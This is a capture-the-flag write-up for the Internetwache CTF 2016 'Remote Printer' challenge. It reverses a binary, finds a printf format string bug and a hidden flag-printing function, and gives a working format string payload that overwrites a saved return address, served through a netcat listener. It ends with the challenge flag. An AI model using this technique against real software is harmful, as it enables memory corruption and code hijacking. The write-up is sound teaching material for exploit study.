[Internetwache CTF 2016] [Exploit 80 – Remote Printer] Write UpDescription
Internetwache CTF 2016 : Remote Printer
Category: Exploit Points: 80 Solves: 101 Description:Description: Printer are very very important for offices. Especially for remote printing. My boss told me to build a tool for that task.
Attachment: exp80.zip
Service: 188.166.133.53:12377
Resolution
We start by inspecting the binary given:
RemotePrinter: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=0xea9ab23d0eafc41d4e10f7b362859f5275d7a156, stripped
We then test it a little bit, it’s asking for a remote server ip and port. The binary connects to that server, reads up to 2000 chars and print it on it’s standart input.
If we use IDA to inspect that method, we find the following:
void __cdecl sub_8048786(char *cp, int a2)
{
char buf; // [sp+Ch] [bp-201Ch]@5
struct sockaddr addr; // [sp+200Ch] [bp-1Ch]@3
int fd; // [sp+201Ch] [bp-Ch]@1
fd = socket(2, 1, 0);
if ( fd == -1 )
{
puts("No socket :(");
}
else
{
*(_DWORD *)&addr.sa_data[2] = inet_addr(cp);
addr.sa_family = 2;
*(_WORD *)&addr.sa_data[0] = htons(a2);
if ( connect(fd, &addr, 0x10u) >= 0 )
{
if ( recv(fd, &buf, 0x2000u, 0) >= 0 )
{
printf(&buf);
close(fd);
}
else
{
puts("No data :(");
}
}
else
{
perror("No communication :(\n");
}
}
}
We can see that the printf is not secure and we have a string format exploit. We also find that function that is never called:
.text:08048867 ; --------------------------------------------------------------------------- .text:08048867 push ebp .text:08048868 mov ebp, esp .text:0804886A sub esp, 48h .text:0804886D sub esp, 8 .text:08048870 push offset aR ; "r" .text:08048875 push offset aFlag_txt ; "flag.txt" .text:0804887A call _fopen .text:0804887F add esp, 10h .text:08048882 mov [ebp-0Ch], eax .text:08048885 sub esp, 4 .text:08048888 push dword ptr [ebp-0Ch] .text:0804888B push 32h .text:0804888D lea eax, [ebp-3Eh] .text:08048890 push eax .text:08048891 call _fgets .text:08048896 add esp, 10h .text:08048899 sub esp, 0Ch .text:0804889C push dword ptr [ebp-0Ch] .text:0804889F call _fclose .text:080488A4 add esp, 10h .text:080488A7 sub esp, 8 .text:080488AA lea eax, [ebp-3Eh] .text:080488AD push eax .text:080488AE push offset aYayFlagS ; "YAY, FLAG: %s\n" .text:080488B3 call _printf .text:080488B8 add esp, 10h .text:080488BB nop .text:080488BC leave .text:080488BD retn
It’s opening a flag.txt file and writing it’s content on stdin.
We then run a little security check:
laxa:Challenges:00:55:00$ checksec --file RemotePrinter RELRO STACK CANARY NX PIE RPATH RUNPATH FILE No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH RemotePrinter
So after that, we check if the ASLR is enabled on the server by giving the server a payload like this “%p%p%p%p”, and the ASLR is off !
So, we need to find the offset of an EIP we are going to rewrite to the printflag function.
In order to achieve that, we disabled the ASLR on a VM and then made a local exploit rewriting the EIP after the function that reads the data from our server.
We also have the adress of the buffer containing the data from our server and we also get that information on the service of the challenge.
We can calculate the offset difference between our VM and the server by doing: address of the buffer on the server – address of the buffer on the VM
We then determine the offset of the EIP we want to rewrite on our VM and then add the offset previously calculated.
We then do a standard string exploit to rewrite only 2 bytes of this EIP since the 2 other bytes are already correctly set:
This was launched on our server receiving the connection from the binary
python -c 'print "\x0c\xdd\xff\xff%34915x%7$hn"' | nc -lnvp 2222
The flag is: IW{YVO_F0RmaTt3d_RMT_Pr1nT3R}